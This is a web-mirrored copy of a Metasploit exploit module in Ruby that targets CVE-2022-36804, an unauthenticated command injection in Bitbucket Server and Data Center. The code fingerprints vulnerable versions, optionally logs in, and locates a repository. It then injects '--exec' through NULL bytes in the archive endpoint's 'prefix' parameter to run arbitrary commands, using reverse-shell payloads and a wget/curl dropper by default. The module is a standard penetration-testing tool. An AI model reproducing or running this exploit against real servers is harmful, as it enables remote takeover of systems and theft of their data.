CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/http/bitbucket_git_cmd_injection.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  prepend Msf::Exploit::Remote::AutoCheck

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Exploit::CmdStager

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Bitbucket Git Command Injection',

18
        'Description' => %q{

19
          Various versions of Bitbucket Server and Data Center are vulnerable to

20
          an unauthenticated command injection vulnerability in multiple API endpoints.

21


22
          The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint

23
          creates an archive of the repository, leveraging the `git-archive` command to do so.

24
          Supplying NULL bytes to the request enables the passing of additional arguments to the

25
          command, ultimately enabling execution of arbitrary commands.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'TheGrandPew', # discovery

30
          'Ron Bowes', # analysis and PoC

31
          'Jang', # testanull - PoC

32
          'Shelby Pace' # Metasploit module

33
        ],

34
        'References' => [

35
          [ 'URL', 'https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/' ],

36
          [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ],

37
          [ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ],

38
          [ 'URL', 'https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/' ],

39
          [ 'CVE', '2022-36804' ]

40
        ],

41
        'Platform' => [ 'linux' ],

42
        'Privileged' => false,

43
        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],

44
        'Targets' => [

45
          [

46
            'Linux Dropper',

47
            {

48
              'Platform' => 'linux',

49
              'Type' => :linux_dropper,

50
              'Arch' => [ ARCH_X86, ARCH_X64 ],

51
              'CmdStagerFlavor' => %w[wget curl bourne],

52
              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }

53
            }

54
          ],

55
          [

56
            'Unix Command',

57
            {

58
              'Platform' => 'unix',

59
              'Type' => :unix_cmd,

60
              'Arch' => ARCH_CMD,

61
              'Payload' => { 'BadChars' => %(:/?#[]@) },

62
              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }

63
            }

64
          ]

65
        ],

66
        'DisclosureDate' => '2022-08-24',

67
        'DefaultTarget' => 0,

68
        'Notes' => {

69
          'Stability' => [ CRASH_SAFE ],

70
          'Reliability' => [ REPEATABLE_SESSION ],

71
          'SideEffects' => [ IOC_IN_LOGS ]

72
        }

73
      )

74
    )

75


76
    register_options(

77
      [

78
        Opt::RPORT(7990),

79
        OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/']),

80
        OptString.new('USERNAME', [ false, 'The username to authenticate with', '' ]),

81
        OptString.new('PASSWORD', [ false, 'The password to authenticate with', '' ])

82
      ]

83
    )

84
  end

85


86
  def check

87
    res = send_request_cgi(

88
      'method' => 'GET',

89
      'keep_cookies' => true,

90
      'uri' => normalize_uri(target_uri.path, 'login')

91
    )

92


93
    return CheckCode::Unknown('Failed to receive response from application') unless res

94


95
    unless res.body.include?('Bitbucket')

96
      return CheckCode::Safe('Target does not appear to be Bitbucket')

97
    end

98


99
    footer = res.get_html_document&.at('footer')

100
    return CheckCode::Detected('Cannot determine version of Bitbucket') unless footer

101


102
    version_str = footer.at('span')&.children&.text

103
    return CheckCode::Detected('Cannot find version string in footer') unless version_str

104


105
    matches = version_str.match(/v(\d+\.\d+\.\d+)/)

106
    return CheckCode::Detected('Version unknown') unless matches && matches.length > 1

107


108
    version_str = matches[1]

109
    vprint_status("Found Bitbucket version: #{matches[1]}")

110


111
    num_vers = Rex::Version.new(version_str)

112
    return CheckCode::NotVulnerable if num_vers <= Rex::Version.new('6.10.17')

113


114
    major, minor, revision = version_str.split('.')

115
    case major

116
    when '6'

117
      return CheckCode::Appears

118
    when '7'

119
      case minor

120
      when '6'

121
        return CheckCode::Appears if revision.to_i < 17

122
      when '17'

123
        return CheckCode::Appears if revision.to_i < 10

124
      when '21'

125
        return CheckCode::Appears if revision.to_i < 4

126
      end

127
    when '8'

128
      case minor

129
      when '0', '1'

130
        return CheckCode::Appears if revision.to_i < 3

131
      when '2'

132
        return CheckCode::Appears if revision.to_i < 2

133
      when '3'

134
        return CheckCode::Appears if revision.to_i < 1

135
      end

136
    end

137


138
    CheckCode::Detected

139
  end

140


141
  def username

142
    datastore['USERNAME']

143
  end

144


145
  def password

146
    datastore['PASSWORD']

147
  end

148


149
  def authenticate

150
    print_status("Attempting to authenticate with user '#{username}' and password '#{password}'")

151
    res = send_request_cgi(

152
      'method' => 'GET',

153
      'uri' => normalize_uri(target_uri.path, 'login'),

154
      'keep_cookies' => true

155
    )

156


157
    fail_with(Failure::UnexpectedReply, 'Failed to reach login page') unless res&.body&.include?('login')

158
    res = send_request_cgi(

159
      'method' => 'POST',

160
      'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),

161
      'keep_cookies' => true,

162
      'vars_post' =>

163
      {

164
        'j_username' => username,

165
        'j_password' => password,

166
        'submit' => 'Log in'

167
      }

168
    )

169


170
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve a response from log in attempt') unless res

171
    res = send_request_cgi(

172
      'method' => 'GET',

173
      'uri' => normalize_uri(target_uri.path, 'dashboard'),

174
      'keep_cookies' => true

175
    )

176


177
    fail_with(Failure::UnexpectedReply, 'Failed to receive a response from the dashboard') unless res

178


179
    unless res.body.include?('Your work') && res.body.include?('Projects')

180
      fail_with(Failure::BadConfig, 'Login failed...Credentials may be invalid')

181
    end

182


183
    @authenticated = true

184
    print_good('Successfully logged into Bitbucket!')

185
  end

186


187
  def find_public_repo

188
    print_status('Searching Bitbucket for publicly accessible repository')

189
    res = send_request_cgi(

190
      'method' => 'GET',

191
      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),

192
      'keep_cookies' => true

193
    )

194


195
    fail_with(Failure::Disconnected, 'Did not receive a response') unless res

196
    json_data = JSON.parse(res.body)

197
    fail_with(Failure::UnexpectedReply, 'Response had no JSON') unless json_data

198


199
    unless json_data['size'] > 0

200
      fail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories')

201
    end

202


203
    # opt for public repos unless none exist.

204
    # Attempt to use a private repo if so

205
    repos = json_data['values']

206
    possible_repos = repos.select { |repo| repo['public'] == true }

207
    if possible_repos.empty? && @authenticated

208
      possible_repos = repos.select { |repo| repo['public'] == false }

209
    end

210


211
    fail_with(Failure::NotFound, 'There doesn\'t appear to be any repos to use') if possible_repos.empty?

212
    possible_repos.each do |repo|

213
      project = repo['project']

214
      next unless project

215


216
      @project = project['key']

217
      @repo = repo['slug']

218
      break if @project && @repo

219
    end

220


221
    fail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo

222
    print_good("Found public repo '#{@repo}' in project '#{@project}'!")

223
  end

224


225
  def execute_command(cmd, _opts = {})

226
    uri = normalize_uri(target_uri.path, 'rest/api/latest/projects', @project, 'repos', @repo, 'archive')

227
    send_request_cgi(

228
      'method' => 'GET',

229
      'uri' => uri,

230
      'keep_cookies' => true,

231
      'vars_get' =>

232
      {

233
        'format' => 'zip',

234
        'path' => Rex::Text.rand_text_alpha(2..5),

235
        'prefix' => "#{Rex::Text.rand_text_alpha(1..3)}\x00--exec=`#{cmd}`\x00--remote=#{Rex::Text.rand_text_alpha(3..8)}"

236
      }

237
    )

238
  end

239


240
  def exploit

241
    @authenticated = false

242
    authenticate unless username.blank? && password.blank?

243
    find_public_repo

244


245
    if target['Type'] == :linux_dropper

246
      execute_cmdstager(linemax: 6000)

247
    else

248
      execute_command(payload.encoded)

249
    end

250
  end

251
end

252


253